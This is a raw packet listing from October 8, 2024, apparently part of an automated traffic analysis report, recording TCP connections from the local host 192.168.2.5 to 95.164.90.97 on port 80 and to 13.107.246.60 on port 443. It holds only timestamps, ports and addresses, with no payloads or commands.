Oct 8, 2024 20:47:24.906523943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906542063 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906559944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906575918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906588078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906615019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906639099 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906646013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906697035 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906697035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906724930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906747103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906758070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906769991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906794071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906805992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906826973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906841993 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906863928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906877041 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906917095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906982899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907016039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907033920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.907058954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907073021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.907097101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907107115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.907130957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907150984 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.907165051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907176018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.907201052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907219887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.907237053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907253981 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.907269955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907289982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.907304049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907320023 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.907341003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907358885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.907376051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907394886 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.907430887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907433987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.907468081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907483101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.907496929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907520056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.907547951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.907883883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907938004 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.907948017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907982111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.907999992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.908031940 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.908092976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.908127069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.908145905 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.908160925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.908174992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.908198118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.908211946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.908231020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.908246994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.908282995 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.939263105 CEST	443	49787	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.939848900 CEST	49787	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.939872026 CEST	443	49787	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.940284014 CEST	49787	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.940289974 CEST	443	49787	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.957181931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.957246065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.957254887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.957282066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.957303047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.957334995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.957335949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.957369089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.957391024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.957403898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.957431078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.957442045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.957458019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.957496881 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.957593918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.957627058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.957650900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.957662106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.957684040 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.957710028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.957716942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.957750082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.957773924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.957783937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.957799911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.957818031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.957834005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.957851887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.957865953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.957901001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.990411043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.990473986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.990488052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.990520954 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.990526915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.990564108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.990597963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.990612030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.990650892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.990658045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.990684986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.990699053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.990719080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.990741014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.990752935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.990771055 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.990801096 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.990824938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.990859032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.990892887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.990906000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.990926027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.990942001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.990962029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.990972042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991007090 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991014004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991048098 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991060019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991081953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991092920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991127014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991183996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991240025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991274118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991286039 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991307974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991317987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991342068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991353989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991372108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991390944 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991421938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991427898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991461992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991475105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991493940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991508961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991527081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991539955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991564989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991574049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991604090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991605997 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991632938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991652012 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991664886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991679907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991700888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991712093 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991746902 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991755962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991790056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991801977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991822958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991836071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991856098 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991868019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991888046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991902113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991925955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.991935968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.991974115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992129087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992162943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992177963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992194891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992209911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992230892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992239952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992264986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992278099 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992296934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992311001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992331982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992341995 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992367029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992377996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992399931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992413044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992444038 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992450953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992485046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992496967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992517948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992528915 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992552996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992563963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992589951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992598057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992639065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992646933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992680073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992695093 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992712975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992726088 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992742062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992762089 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992775917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992785931 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992810011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992822886 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992847919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992854118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992885113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992893934 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992924929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992930889 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.992961884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.992973089 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993005037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993032932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993060112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993077993 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993093014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993103981 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993125916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993139982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993160009 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993172884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993192911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993202925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993230104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993242979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993271112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993274927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993304968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993311882 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993339062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993350983 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993383884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993383884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993429899 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993452072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993484974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993499994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993519068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993530989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993552923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993563890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993592024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993604898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993638039 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993700981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993731022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993746042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993763924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993777990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993798018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993808031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993829012 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993840933 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993863106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993875027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993896008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993907928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993927002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.993941069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.993972063 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994055986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994090080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994106054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994119883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994132996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994153023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994165897 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994185925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994194984 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994219065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994226933 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994252920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994262934 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994280100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994293928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994313002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994319916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994345903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994353056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994379044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994385958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994410038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994419098 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994438887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994450092 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994472980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994481087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994513988 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994525909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994558096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994566917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994592905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994600058 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994632959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994766951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994812965 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994817972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994862080 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994889975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.994934082 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.994972944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.995004892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.995014906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.995038986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.995044947 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.995079994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.995091915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.995124102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.995131969 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.995163918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.044003010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.044027090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.044039965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.044069052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.044090033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.044118881 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.044131041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.044143915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.044157028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.044171095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.044183016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.044188023 CEST	49755	80	192.168.2.5	95.164.90.97
